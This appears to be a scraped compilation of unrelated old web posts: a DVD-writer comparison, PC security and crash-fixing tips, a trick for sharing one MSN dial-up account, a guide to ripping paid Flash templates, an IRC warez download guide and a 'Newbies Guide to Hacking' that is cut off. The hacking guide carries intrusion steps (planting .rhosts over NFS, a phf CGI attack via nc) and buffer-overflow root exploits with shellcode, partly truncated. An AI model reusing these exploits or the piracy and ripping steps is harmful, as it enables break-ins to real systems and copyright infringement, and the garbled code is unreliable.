Since the introduction of double layer DVD writers, the interest has been quite overwhelming and is why we keep bringing you reviews of these highly popular drives. The anticipation has now turned into down right obsession and it has become a key component in any current or new system build, thanks to the declining prices and continued media hype. Manufacturers are quite aware of the fascination and is why they have each been releasing their own products which excel in at least one area of the testing methodology used in most reviews. This has led to some confusion as to which drive is best suited for the individuals needs. Today, we compare four 16x double layer drives and highlight both the strong and weak points in order to give you a better idea of which drive is best suited for you.

In this comparison guide, we will be looking at four of the top 16x drives to hit the market, the Pioneer DVR-108, NEC ND3500A, Lite-On SOHW-1633s and the new LG GSA-4160B. We will cover everything from design and features to performance and price. Let's begin with a quick look at each of these drives.

As far as the front bezel design goes, the LG-GSA4160B is by far the most attractive drive of the bunch. However, for those who are looking for a headphone jack, the Lite-On drive is the only DL writer offering a headphone jack, as well as volume control. The Pioneer and NEC drives, in my opinion, are the ugliest drives, with a very plain look that just wants to make you hide the drive period. Although we only obtained the 4160B in black, all these drives are offered with both white and black bezels. If you opt for the more expensive Pioneer "XL" model, it has the most impressive looks of any drive in the market. However, this will come at a very hefty price tag, considering they contain different firmware as well that offer a few extra features.

So, we have determined which is the sexiest-looking drive, but what about performance? I've done some extensive testing on each model to determine which is indeed the most impressive of the bunch. But before we show you performance results, let's briefly look at the features and what they have to offer.


Each one of these drives has there disappointments when it comes to features. Let's compare each to see what they really offer.

DVD Writing

LG GSA-4160B 16x 8x 4x 4x
Lite-On SOHW-1633s 16x 8x 4x 4x
NEC ND-3500A 16x 16x 4x 4x
Pioneer DVR-108 16x 16x 4x 4x

While all these drives are indeed 16x models, only two will write to both formats at this speed. The LG GSA-4160B and the Lite-On SOHW-1633s only support 8x DVD-R writing. So if you are one who only prefers this format, the NEC or Pioneer would be the best choice. All of these drives support writing to DVD re-writable media at 4x.

DVD+R9 Double Layer Writing

Write Speed
LG GSA-4160B 2.4x
Lite-On SOHW-1633s 2.4x
NEC ND-3500A 4x
Pioneer DVR-108 4x

The major disappointment with both the LG and the Lite-On 16x drives is the lack of 4x double layer writing support. Pioneer and NEC seem to be the only manufacturers to jump in and release second generation double layer drives supporting much faster 4x writing. In fact, the jump from 2.4x to 4x is quite substantial as we will show you a bit later in this comparison.

DVD-RAM Support

Supported Read Write
LG GSA-4160B YES 5x 5x
Lite-On SOHW-1633s NO NO NO
Pioneer DVR-108 YES 2x NO

Now this is where both the LG GSA-4120B and GSA-4160B shine above the rest. In fact, it is what has made these drives the most popular DVD writers on the market. Unlike the rest in the roundup, it is a triple format burner, offering full support for DVD-RAM media. The other drives do not support it, with the exception of the Pioneer DVR-108 which supports reading of DVD-RAM discs at 2x. I personally don't see the point in offering only read capabilities, but it's at least one extra feature added to distinguish it from the rest. Fast 5x support of the LG GSA-4160 will actually be tested a bit later in this article.

CDR Writing

LG GSA-4160B 40x 24x
Lite-On SOHW-1633s 48x 24x
NEC ND-3500A 48x 24x
Pioneer DVR-108 32x 24x

The fastest CDR writers of the bunch are the Lite-On SOHW-1633s and the NEC ND-3500A. With their support for 48x writing, they make a great all-in-one drive for many users. The only drive lacking in this lineup is the Pioneer DVR-108. Why they opted for only 32x writing is still quite puzzling and is actually why I have found that many are choosing the NEC over the Pioneer. The LG GSA-4160B should not be left out of consideration though. We will show you later that the difference in write times between 40x and 48x is not much to brag about.

Bitsetting Support

One feature I've found that is most important for many users is bitsetting support. Let's compare these drives and see what they offer.

DVD+R/RW Support DVD+R DL Support
Lite-On SOHW-1633s YES NO
Pioneer DVR-108 NO YES

The LG GSA-4160B does not offer bitsetting support out of the box. However, it is very likely that you will be able to obtain support through an excellent third-party tool called DVDInfo Pro. Right now, they only support the GSA-4120B, but I'm confident with the author that support for this drive will be likely. LG firmware is very hard to hack, however some select few have been able to do so. Using Lite-On's booktype utility, you can change the booktype of DVD+R/RW media, however, the firmware does not automatically change booktype of DVD+R DL discs to DVD-ROM like the NEC and Pioneer models do.

Additional Features

As far as other features go, all these drives have a 2MB buffer but offer some sort of buffer under-run protection, which all work exceptionally well. This is especially useful if you will be burning discs at 16x, which I personally don't recommend just yet. As our individual tests of these drives revealed, burning at this speed is quite unstable, with the exception of the Lite-On SOHW-1633s.


10 Security Enhancements

10 Fast and Free Security Enhancements
PC magazine.

Before you spend a dime on security, there are many precautions you can take that will protect you against the most common threats.

1. Check Windows Update and Office Update regularly (_; have your Office CD ready. Windows Me, 2000, and XP users can configure automatic updates. Click on the Automatic Updates tab in the System control panel and choose the appropriate options.

2. Install a personal firewall. Both SyGate ( and ZoneAlarm ( offer free versions.

3. Install a free spyware blocker. Our Editors' Choice ("Spyware," April 22) was SpyBot Search & Destroy (_ SpyBot is also paranoid and ruthless in hunting out tracking cookies.

4. Block pop-up spam messages in Windows NT, 2000, or XP by disabling the Windows Messenger service (this is unrelated to the instant messaging program). Open Control Panel | Administrative Tools | Services and you'll see Messenger. Right-click and go to Properties. Set Start-up Type to Disabled and press the Stop button. Bye-bye, spam pop-ups! Any good firewall will also stop them.

5. Use strong passwords and change them periodically. Passwords should have at least seven characters; use letters and numbers and have at least one symbol. A decent example would be f8izKro@l. This will make it much harder for anyone to gain access to your accounts.

6. If you're using Outlook or Outlook Express, use the current version or one with the Outlook Security Update installed. The update and current versions patch numerous vulnerabilities.

7. Buy antivirus software and keep it up to date. If you're not willing to pay, try Grisoft AVG Free Edition (Grisoft Inc., w* And doublecheck your AV with the free, online-only scanners available at w* and _

8. If you have a wireless network, turn on the security features: Use MAC filtering, turn off SSID broadcast, and even use WEP with the biggest key you can get. For more, check out our wireless section or see the expanded coverage in Your Unwired World in our next issue.

9. Join a respectable e-mail security list, such as the one found at our own Security Supersite at _, so that you learn about emerging threats quickly and can take proper precautions.

10. Be skeptical of things on the Internet. Don't assume that e-mail "From:" a particular person is actually from that person until you have further reason to believe it's that person. Don't assume that an attachment is what it says it is. Don't give out your password to anyone, even if that person claims to be from "support."


10 reasons why PCs crash U must Know

10 reasons why PCs crash U must Know

Fatal error: the system has become unstable or is busy," it says. "Enter to return to Windows or press Control-Alt-Delete to restart your computer. If you do this you will lose any unsaved information in all open applications."

You have just been struck by the Blue Screen of Death. Anyone who uses Mcft Windows will be familiar with this. What can you do? More importantly, how can you prevent it happening?

1 Hardware conflict

The number one reason why Windows crashes is hardware conflict. Each hardware device communicates to other devices through an interrupt request channel (IRQ). These are supposed to be unique for each device.

For example, a printer usually connects internally on IRQ 7. The keyboard usually uses IRQ 1 and the floppy disk drive IRQ 6. Each device will try to hog a single IRQ for itself.

If there are a lot of devices, or if they are not installed properly, two of them may end up sharing the same IRQ number. When the user tries to use both devices at the same time, a crash can happen. The way to check if your computer has a hardware conflict is through the following route:

* Start-Settings-Control Panel-System-Device Manager.

Often if a device has a problem a yellow '!' appears next to its description in the Device Manager. Highlight Computer (in the Device Manager) and press Properties to see the IRQ numbers used by your computer. If the IRQ number appears twice, two devices may be using it.

Sometimes a device might share an IRQ with something described as 'IRQ holder for PCI steering'. This can be ignored. The best way to fix this problem is to remove the problem device and reinstall it.

Sometimes you may have to find more recent drivers on the internet to make the device function properly. A good resource is If the device is a soundcard, or a modem, it can often be fixed by moving it to a different slot on the motherboard (be careful about opening your computer, as you may void the warranty).

When working inside a computer you should switch it off, unplug the mains lead and touch an unpainted metal surface to discharge any static electricity.

To be fair to Mcft, the problem with IRQ numbers is not of its making. It is a legacy problem going back to the first PC designs using the IBM 8086 chip. Initially there were only eight IRQs. Today there are 16 IRQs in a PC. It is easy to run out of them. There are plans to increase the number of IRQs in future designs.

2 Bad Ram

Ram (random-access memory) problems might bring on the blue screen of death with a message saying Fatal Exception Error. A fatal error indicates a serious hardware problem. Sometimes it may mean a part is damaged and will need replacing.

But a fatal error caused by Ram might be caused by a mismatch of chips. For example, mixing 70-nanosecond (70ns) Ram with 60ns Ram will usually force the computer to run all the Ram at the slower speed. This will often crash the machine if the Ram is overworked.

One way around this problem is to enter the BIOS settings and increase the wait state of the Ram. This can make it more stable. Another way to troubleshoot a suspected Ram problem is to rearrange the Ram chips on the motherboard, or take some of them out. Then try to repeat the circumstances that caused the crash. When handling Ram try not to touch the gold connections, as they can be easily damaged.

Parity error messages also refer to Ram. Modern Ram chips are either parity (ECC) or non parity (non-ECC). It is best not to mix the two types, as this can be a cause of trouble.

EMM386 error messages refer to memory problems but may not be connected to bad Ram. This may be due to free memory problems often linked to old Dos-based programmes.

3 BIOS settings

Every motherboard is supplied with a range of chipset settings that are decided in the factory. A common way to access these settings is to press the F2 or delete button during the first few seconds of a boot-up.

Once inside the BIOS, great care should be taken. It is a good idea to write down on a piece of paper all the settings that appear on the screen. That way, if you change something and the computer becomes more unstable, you will know what settings to revert to.

A common BIOS error concerns the CAS latency. This refers to the Ram. Older EDO (extended data out) Ram has a CAS latency of 3. Newer SDRam has a CAS latency of 2. Setting the wrong figure can cause the Ram to lock up and freeze the computer's display.

Mcft Windows is better at allocating IRQ numbers than any BIOS. If possible set the IRQ numbers to Auto in the BIOS. This will allow Windows to allocate the IRQ numbers (make sure the BIOS setting for Plug and Play OS is switched to 'yes' to allow Windows to do this.).

4 Hard disk drives

After a few weeks, the information on a hard disk drive starts to become piecemeal or fragmented. It is a good idea to defragment the hard disk every week or so, to prevent the disk from causing a screen freeze. Go to

* Start-Programs-Accessories-System Tools-Disk Defragmenter

This will start the procedure. You will be unable to write data to the hard drive (to save it) while the disk is defragmenting, so it is a good idea to schedule the procedure for a period of inactivity using the Task Scheduler.

The Task Scheduler should be one of the small icons on the bottom right of the Windows opening page (the desktop).

Some lockups and screen freezes caused by hard disk problems can be solved by reducing the read-ahead optimisation. This can be adjusted by going to

* Start-Settings-Control Panel-System Icon-Performance-File System-Hard Disk.

Hard disks will slow down and crash if they are too full. Do some housekeeping on your hard drive every few months and free some space on it. Open the Windows folder on the C drive and find the Temporary Internet Files folder. Deleting the contents (not the folder) can free a lot of space.

Empty the Recycle Bin every week to free more space. Hard disk drives should be scanned every week for errors or bad sectors. Go to

* Start-Programs-Accessories-System Tools-ScanDisk

Otherwise assign the Task Scheduler to perform this operation at night when the computer is not in use.

5 Fatal OE exceptions and VXD errors

Fatal OE exception errors and VXD errors are often caused by video card problems.

These can often be resolved easily by reducing the resolution of the video display. Go to

* Start-Settings-Control Panel-Display-Settings

Here you should slide the screen area bar to the left. Take a look at the colour settings on the left of that window. For most desktops, high colour 16-bit depth is adequate.

If the screen freezes or you experience system lockups it might be due to the video card. Make sure it does not have a hardware conflict. Go to

* Start-Settings-Control Panel-System-Device Manager

Here, select the + beside Display Adapter. A line of text describing your video card should appear. Select it (make it blue) and press properties. Then select Resources and select each line in the window. Look for a message that says No Conflicts.

If you have video card hardware conflict, you will see it here. Be careful at this point and make a note of everything you do in case you make things worse.

The way to resolve a hardware conflict is to uncheck the Use Automatic Settings box and hit the Change Settings button. You are searching for a setting that will display a No Conflicts message.

Another useful way to resolve video problems is to go to

* Start-Settings-Control Panel-System-Performance-Graphics

Here you should move the Hardware Acceleration slider to the left. As ever, the most common cause of problems relating to graphics cards is old or faulty drivers (a driver is a small piece of software used by a computer to communicate with a device).

Look up your video card's manufacturer on the internet and search for the most recent drivers for it.

6 Viruses

Often the first sign of a virus infection is instability. Some viruses erase the boot sector of a hard drive, making it impossible to start. This is why it is a good idea to create a Windows start-up disk. Go to

* Start-Settings-Control Panel-Add/Remove Programs

Here, look for the Start Up Disk tab. Virus protection requires constant vigilance.

A virus scanner requires a list of virus signatures in order to be able to identify viruses. These signatures are stored in a DAT file. DAT files should be updated weekly from the website of your antivirus software manufacturer.

An excellent antivirus programme is McAfee VirusScan by Network Associates ( Another is Norton AntiVirus 2000, made by Symantec (

7 Printers

The action of sending a document to print creates a bigger file, often called a postscript file.

Printers have only a small amount of memory, called a buffer. This can be easily overloaded. Printing a document also uses a considerable amount of CPU power. This will also slow down the computer's performance.

If the printer is trying to print unusual characters, these might not be recognised, and can crash the computer. Sometimes printers will not recover from a crash because of confusion in the buffer. A good way to clear the buffer is to unplug the printer for ten seconds. Booting up from a powerless state, also called a cold boot, will restore the printer's default settings and you may be able to carry on.

8 Software

A common cause of computer crash is faulty or badly-installed software. Often the problem can be cured by uninstalling the software and then reinstalling it. Use Norton Uninstall or Uninstall Shield to remove an application from your system properly. This will also remove references to the programme in the System Registry and leaves the way clear for a completely fresh copy.

The System Registry can be corrupted by old references to obsolete software that you thought was uninstalled. Use Reg Cleaner by Jouni Vuorio to clean up the System Registry and remove obsolete entries. It works on Windows 95, Windows 98, Windows 98 SE (Second Edition), Windows Millennium Edition (ME), NT4 and Windows 2000.

Read the instructions and use it carefully so you don't do permanent damage to the Registry. If the Registry is damaged you will have to reinstall your operating system. Reg Cleaner can be obtained from

Often a Windows problem can be resolved by entering Safe Mode. This can be done during start-up. When you see the message "Starting Windows" press F4. This should take you into Safe Mode.

Safe Mode loads a minimum of drivers. It allows you to find and fix problems that prevent Windows from loading properly.

Sometimes installing Windows is difficult because of unsuitable BIOS settings. If you keep getting SUWIN error messages (Windows setup) during the Windows installation, then try entering the BIOS and disabling the CPU internal cache. Try to disable the Level 2 (L2) cache if that doesn't work.

Remember to restore all the BIOS settings back to their former settings following installation.

9 Overheating

Central processing units (CPUs) are usually equipped with fans to keep them cool. If the fan fails or if the CPU gets old it may start to overheat and generate a particular kind of error called a kernel error. This is a common problem in chips that have been overclocked to operate at higher speeds than they are supposed to.

One remedy is to get a bigger better fan and install it on top of the CPU. Specialist cooling fans/heatsinks are available from or

CPU problems can often be fixed by disabling the CPU internal cache in the BIOS. This will make the machine run more slowly, but it should also be more stable.

10 Power supply problems

With all the new construction going on around the country the steady supply of electricity has become disrupted. A power surge or spike can crash a computer as easily as a power cut.

If this has become a nuisance for you then consider buying a uninterrupted power supply (UPS). This will give you a clean power supply when there is electricity, and it will give you a few minutes to perform a controlled shutdown in case of a power cut.

It is a good investment if your data are critical, because a power cut will cause any unsaved data to be lost.


8 People Can Use The Same Msn Dial Up Account

8 People Can Use The Same Msn Dial Up Account

its easy really. want to have an entire family on dial-up with just one bill?

step one. purchase 20 dollar a month subscription to MSN unlimited access dial up. This will include an MSN 9 cd which you will need. With the software installed, fill up your secondary account slots with new users. Make sure you pick @msn if it gives you the choice, hotmail email addresses will not work..

say the secondary account is type in the Dial up connection

USER : MSN/johnsmith
PASS: ******* (whatever)

connect to your local msn phone number and the other people you gave secondary accounts to will be able to do the same, while you are connected. Its a sweet deal considering everyone is paying about 2 bucks a month for internet access, especially if you cannot get broadband. if you wanted to sell off the access to people you could actually make money doing this.. but i do not suggest it.

I used to be an msn tech and this was a little known secret even to most of the employees.

After you do this you do not need the software any more. I would suggest keeping it on to micromanage everyone else's accounts. and for the simple fact that if they don't pitch in, cut them off HEHEHE

i'm on broadband now so i dont care if i tell you my little secret. anyone else knew of this?

-[ How to rip Dynamic Flash Template ]-

 -[ How to rip Dynamic Flash Template ]-

How to Rip TM Dynamic Flash Templates
by: Baisan

What you need:

Sample dynamic flash template from TM website
Sothink SWF Decompiler
Macromedia Flash

1. browse or search your favorite dynamic flash template in TM website. If you got one... click the "view" link and new window will open with dynamic flash.. loading...

2. If the movie fully loaded, click View -> Source in your browser to bring the source code of the current page and in the source code, search for "IFRAME" and you will see the iframe page. In this example were going to try the 7045 dynamic template. get the URL(ex. then paste it to your browser... easy eh? wait! dont be to excited... erase the .html and change it to swf then press enter then you'll see the flash movie again icon_smile.gif.

3. copy the URL and download that SWF file.. use your favorite download manager.. mine I used flashget icon_smile.gif NOTE: dont close the browser we may need that later on.

4. open your Sothink SWF decompiler... click "Quick Open" then browse where you download your SWF/movie file. Click Export FLA to export your SWF to FLA, in short, save it as FLA icon_smile.gif

5. Open your Macromedia FLash and open the saved FLA file. press Control+Enter or publish the file... then wallah! the output window will come up with "Error opening URL blah blah blah..." dont panic, that error will help you where to get the remaining files.

6. Copy the first error, example: "7045_main.html" then go back to your browser and replace the 7045.swf to 7045_main.html press enter and you'll see a lot of text... nonsense text icon_lol.gif that text are your contents...

NOTE: when you save the remaining files dont forget to save with underscore sign (_) in the front on the file without the TM item number (e.g. 7045) if it is html save it as "_main.html" and same with the image save it as "_works1.jpg" save them where you save the FLA and SWF files. Continue browsing the file inside Flash application so you can track the remaining files... do the same until you finish downloading all the remaining the files.


#DataVault, Irc Warez (Ty 4 Moving X)

 Not Sure If Many People Use This Site, however heres A Few Steps To getting In.. And Getting The Latest Games..

Right 1st You Need mIRC (Download Below)

Once Downloaded And Installed.. Next Step Is To Get Yourself Connected To The Datavault Network..

Step 1 :- Open irc, Goto Tools,Options. Then Servers, Click Add
Under Description Type : DataVault
Under IRC Server Type :
Under Port(S) Type : 6667-6669

Now Click Ok..

Step 2 : Connecting To Irc.Addictz.Net

Goto Tools/Options/Servers
Select Datavault From Drop Down Menu
Tick "New Server Window"
Then Click Connect

A New Window Will Open Telling You That You Are Connecting To

Step 3 : Now You Have To Register YourSelf.

In The Window Type /msg nickserv register "your Password" "Your Valid Email"
Next Type /msg NickServ IDENTIFY "The Password You Just Entered"

It Should Now Say Your Registered!

Now Type /J #Datavault

Step 4 : The Bots In DataVault Spam What They Host Every 1 Hour, Becareful Not To Spam These Or Else You Will Be Banned..

Every Hour You Will See What Looks Like Below :-

** To request a file type: "/msg slut02 BITCH send #x
#1 392x [0.7G] Torque.DVDRiP.XviD-BRUTUS
#2 1509x [0.7G] The.Butterfly.Effect.DVDRip.XviD-DMT

It's Simple To Request A Download Now..

There Are Different Bots With Different Names, Ie Slut02 Is Just One Bot, There Are More Called Dv44, Dv33 Slut03 Etc.. However The Trigger Principle Is The Sa,e

Now If For Example You Wanted To Download "The ButterFly Effect", In The Main Chat Window You Would Type or Copy /msg slut02 BITCH send #2

Let Me Explaine.. /msg Is The Trigger, Slut02 Is The Bot BITCH and Send Are Both Triggers #2 Is The File Number You Want. Each Bot Can Host Numerouse Files, Ie #1 Being Another Film, #3 Also Being Another Film.

Once You Have Done That And Press Return, Just Sit Back And Wait.. Either The Download Will Start Straight Away, Or You Will Be Qued (*Cough Dodgy Spelling*)

Right Now To The Benifits Of #Datavault..

1: The Latest Release Of Most Films And Games.
2: 99.99% The Time You Get To Download At You Max BandWidth No Matter Your Connection (Either 56k (Omg Dont Download A 3 Gig File On That!!), Or A T1/OC3 Connection))

I Hope Someone Finds This HelpFull, If It's In The Wrong Place/ Or Inappropriate Then Plz Delete And Serve Me The Warning I Deserve....

Edit : It's A Good Idea To Have Auto Accept Dcc On, Incase Your Away When You Come InLine For Your Download, Generally Even If Your 20th In Que And It Says 3 Hours Wait, Your Prolly Looking At Around 30 Mins Waiting Slot..

Any Problems Please Let Me Know.. NN Peeps.. anilworld89

The Newbies-User's Guide to Hacking

      User's guide

Well, howdi folks... I guess you are all wondering who's this guy (me)
that's trying to show you a bit of everything... ?
Well, I ain't telling you anything of that...
Copyright, and other stuff like this (below).

Copyright and stuff...

If you feel offended by this subject (hacking) or you think that you could
do better, don't read the below information...
This file is for educational purposes ONLY...;)
I ain't responsible for any damages you made after reading this...(I'm very
So this can be copied, but not modified (send me the changes, and if they
are good, I'll include them ).
Don't read it, 'cuz it might be illegal.
I warned you...
If you would like to continue, press <PgDown>.

Intro: Hacking step by step.

Well, this ain't exactely for begginers, but it'll have to do.
What all hackers has to know is that there are 4 steps in hacking...

Step 1: Getting access to site.
Step 2: Hacking r00t.
Step 3: Covering your traces.
Step 4: Keeping that account.

Ok. In the next pages we'll see exactely what I ment.

Step 1: Getting access.

Well folks, there are several methods to get access to a site.
I'll try to explain the most used ones.
The first thing I do is see if the system has an export list:

mysite:~>/usr/sbin/showmount -e
RPC: Program not registered.

If it gives a message like this one, then it's time to search another way
What I was trying to do was to exploit an old security problem by most
SUN OS's that could allow an remote attacker to add a .rhosts to a users
home directory... (That was possible if the site had mounted their home
Let's see what happens...

mysite:~>/usr/sbin/showmount -e
/home (everyone)
/cdrom (everyone)
mysite:~>mkdir /tmp/mount
mysite:~>/bin/mount -nt nfs /tmp/mount/
mysite:~>ls -sal /tmp/mount
   total 9
   1 drwxrwxr-x   8 root     root         1024 Jul  4 20:34 ./
   1 drwxr-xr-x  19 root     root         1024 Oct  8 13:42 ../
   1 drwxr-xr-x   3 at1      users        1024 Jun 22 19:18 at1/
   1 dr-xr-xr-x   8 ftp      wheel        1024 Jul 12 14:20 ftp/
   1 drwxrx-r-x   3 john     100          1024 Jul  6 13:42 john/
   1 drwxrx-r-x   3 139      100          1024 Sep 15 12:24 paul/
   1 -rw-------   1 root     root          242 Mar  9  1997 sudoers
   1 drwx------   3 test     100          1024 Oct  8 21:05 test/
   1 drwx------  15 102      100          1024 Oct 20 18:57 rapper/
Well, we wanna hack into rapper's home.
uid=0 euid=0
mysite:~>echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd

We use /bin/csh 'cuz bash leaves a (Damn!) .bash_history  and you might
forget it on the remote server...

mysite:~>su - rapper
Welcome to rapper's user.
mysite:~>ls -lsa /tmp/mount/
   total 9
   1 drwxrwxr-x   8 root     root         1024 Jul  4 20:34 ./
   1 drwxr-xr-x  19 root     root         1024 Oct  8 13:42 ../
   1 drwxr-xr-x   3 at1      users        1024 Jun 22 19:18 at1/
   1 dr-xr-xr-x   8 ftp      wheel        1024 Jul 12 14:20 ftp/
   1 drwxrx-r-x   3 john     100          1024 Jul  6 13:42 john/
   1 drwxrx-r-x   3 139      100          1024 Sep 15 12:24 paul/
   1 -rw-------   1 root     root          242 Mar  9  1997 sudoers
   1 drwx------   3 test     100          1024 Oct  8 21:05 test/
   1 drwx------  15 rapper   daemon       1024 Oct 20 18:57 rapper/

So we own this guy's home directory...

mysite:~>echo "+ +" > rapper/.rhosts
mysite:~>cd /
Welcome to Victim.Site.Com.
SunOs ver....(crap).

This is the first method...
Another method could be to see if the site has an open 80 port. That would
mean that the site has a web page.
(And that's very bad, 'cuz it usually it's vulnerable).
Below I include the source of a scanner that helped me when NMAP wasn't written.
(Go get it at Good job, Fyodor).
NMAP is a scanner that does even stealth scanning, so lots of systems won't
record it.

/* -*-C-*- tcpprobe.c */
/* tcpprobe - report on which tcp ports accept connections */
/* IO ERROR,, Sep 15, 1995 */

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <netdb.h>
#include <signal.h>

int main(int argc, char **argv)
  int probeport = 0;
  struct hostent *host;
  int err, i, net;
  struct sockaddr_in sa;

  if (argc != 2) {
    printf("Usage: %s hostname\n", argv[0]);

  for (i = 1; i < 1024; i++) {
    strncpy((char *)&sa, "", sizeof sa);
    sa.sin_family = AF_INET;
    if (isdigit(*argv[1]))
      sa.sin_addr.s_addr = inet_addr(argv[1]);
    else if ((host = gethostbyname(argv[1])) != 0)
      strncpy((char *)&sa.sin_addr, (char *)host->h_addr, sizeof sa.sin_addr);
    else {
    sa.sin_port = htons(i);
    net = socket(AF_INET, SOCK_STREAM, 0);
    if (net < 0) {
    err = connect(net, (struct sockaddr *) &sa, sizeof sa);
    if (err < 0) {
      printf("%s %-5d %s\r", argv[1], i, strerror(errno));
    } else {
      printf("%s %-5d accepted.                               \n", argv[1], i);
      if (shutdown(net, 2) < 0) {
  printf("                                                                \r");
  return (0);

Well, now be very carefull with the below exploits, because they usually get
Besides, if you really wanna get a source file from /cgi-bin/ use this
sintax : lynx
If you don't wanna do that, then do a :

mysite:~>echo "+ +" > /tmp/rhosts

mysite:~>echo "GET /cgi-bin/phf?
/root/.rhosts" | nc -v - 20 80

mysite:~>rlogin -l root
Welcome to Victim1.Site.Com.

Or, maybe, just try to find out usernames and passwords...
The usual users are "test", "guest", and maybe the owner of the site...
I usually don't do such things, but you can...

Or if the site is really old, use that (quote site exec) old bug for
There are  a lot of other exploits, like the remote exploits (innd, imap2,
pop3, etc...) that you can find at or at

Enough about this topic. (besides, if you can finger the site, you can
figgure out usernames and maybe by guessing passwords (sigh!) you could get
access to the site).

Step 2: Hacking r00t.

First you have to find the system it's running...
ALL versions:
A big bug for all linux versions is mount/umount and (maybe) lpr.

/* Mount Exploit for Linux, Jul 30 1996

::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````"":::::::::
:::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$ ::::::

Discovered and Coded by Bloodmask & Vio
Covin Security 1996

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>

#define PATH_MOUNT "/bin/mount"
#define BUFFER_SIZE 1024

u_long get_esp()
  __asm__("movl %esp, %eax");


main(int argc, char **argv)
  u_char execshell[] =

   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   int i;
   int ofs = DEFAULT_OFFSET;

   buff = malloc(4096);
      printf("can't allocate memory\n");
   ptr = buff;

   /* fill start of buffer with nops */

   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);

   /* stick asm code into the buffer */

   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];

   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;

   printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n");
   execl(PATH_MOUNT, "mount", buff, NULL);

/*LPR exploit:I don't know the author...*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define DEFAULT_OFFSET          50
#define BUFFER_SIZE             1023

long get_esp(void)
   __asm__("movl %esp,%eax\n");

void main()
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
   int i;

   buff = malloc(4096);
      printf("can't allocate memory\n");
   ptr = buff;
   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];
   addr_ptr = (long *)ptr;
      *(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
   ptr = (char *)addr_ptr;
   *ptr = 0;
   execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);

b.) Version's 1.2.* to 1.3.2
NLSPATH env. variable exploit:

/* It's really annoying for users and good for me...
AT exploit gives only uid=0 and euid=your_usual_euid.
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>

#define path "/usr/bin/at"
#define BUFFER_SIZE 1024

u_long get_esp()
  __asm__("movl %esp, %eax");


main(int argc, char **argv)
  u_char execshell[] =

   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   int i;
   int ofs = DEFAULT_OFFSET;

   buff = malloc(4096);
      printf("can't allocate memory\n");
   ptr = buff;

   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);

   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];

   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;

   printf("AT exploit discovered by me, _PHANTOM_ in 1997.\n");
   execl(path, "at",NULL);

SENDMAIL exploit: (don't try to chmod a-s this one... :) )

/* SENDMAIL Exploit for Linux

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>

#define path "/usr/bin/sendmail"
#define BUFFER_SIZE 1024

u_long get_esp()
  __asm__("movl %esp, %eax");


main(int argc, char **argv)
  u_char execshell[] =

   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   int i;
   int ofs = DEFAULT_OFFSET;

   buff = malloc(4096);
      printf("can't allocate memory\n");
   ptr = buff;

   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);

   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];

   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;

   printf("SENDMAIL exploit discovered by me, _PHANTOM_ in  1997\n");
   execl(path, "sendmail",NULL);

MOD_LDT exploit (GOD, this one gave such a headache to my Sysadmin (ROOT)

/* this is a hack of a hack.  a valid was needed to get this
   sploit to werk.. but not any longer.. This sploit will give you root
   if the modify_ldt bug werks.. which I beleive it does in any kernel
   before 1.3.20 ..

/* original code written by Morten Welinder.
 * this required 2 hacks to work on the 1.2.13 kernel that I've tested on:
 * 1. asm/sigcontext.h does not exist on 1.2.13 and so it is removed.
 * 2. the _task in the file has no leading underscore.
 * I am not sure at what point these were changed, if you are
 * using this on a newer kernel compile with NEWERKERNEL defined.
 *                                          -ReD

#include <linux/ldt.h>
#include <stdio.h>
